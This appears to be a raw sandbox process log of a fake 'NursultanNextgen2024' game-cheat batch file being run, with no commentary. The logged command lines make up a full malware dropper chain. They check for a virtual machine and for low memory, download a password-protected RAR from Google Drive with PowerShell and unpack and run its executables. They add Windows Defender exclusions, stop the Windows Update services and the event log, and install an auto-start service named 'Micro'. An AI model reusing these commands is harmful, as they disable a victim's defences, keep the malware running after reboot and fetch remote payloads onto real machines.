C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "Micro"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "Micro" binpath= "C:\ProgramData\soft\regedit.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 --field-trial-handle=1796,i,16058697972892276977,15348864233783186660,131072 /prefetch:8
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat" "
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NURSULTAN.rar"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2A2602458B78C2943F969BB407A4802A --mojo-platform-channel-handle=1624 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CB98DFFA9D2613AE5C9616350F64A029 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CB98DFFA9D2613AE5C9616350F64A029 --renderer-client-id=2 --mojo-platform-channel-handle=1616 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=03155E86FA537F8458B6B41F162EF29E --mojo-platform-channel-handle=2208 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F4215226BE1FFC9129336BE42C22A863 --mojo-platform-channel-handle=2352 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=24F9B56FCB94CFC1E6718978FA23BAEB --mojo-platform-channel-handle=1804 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\NURSULTAN.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\NURSULTAN.rar"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Downloads\NURSULTAN.rar
C:\Program Files\Mozilla Firefox\firefox.exe
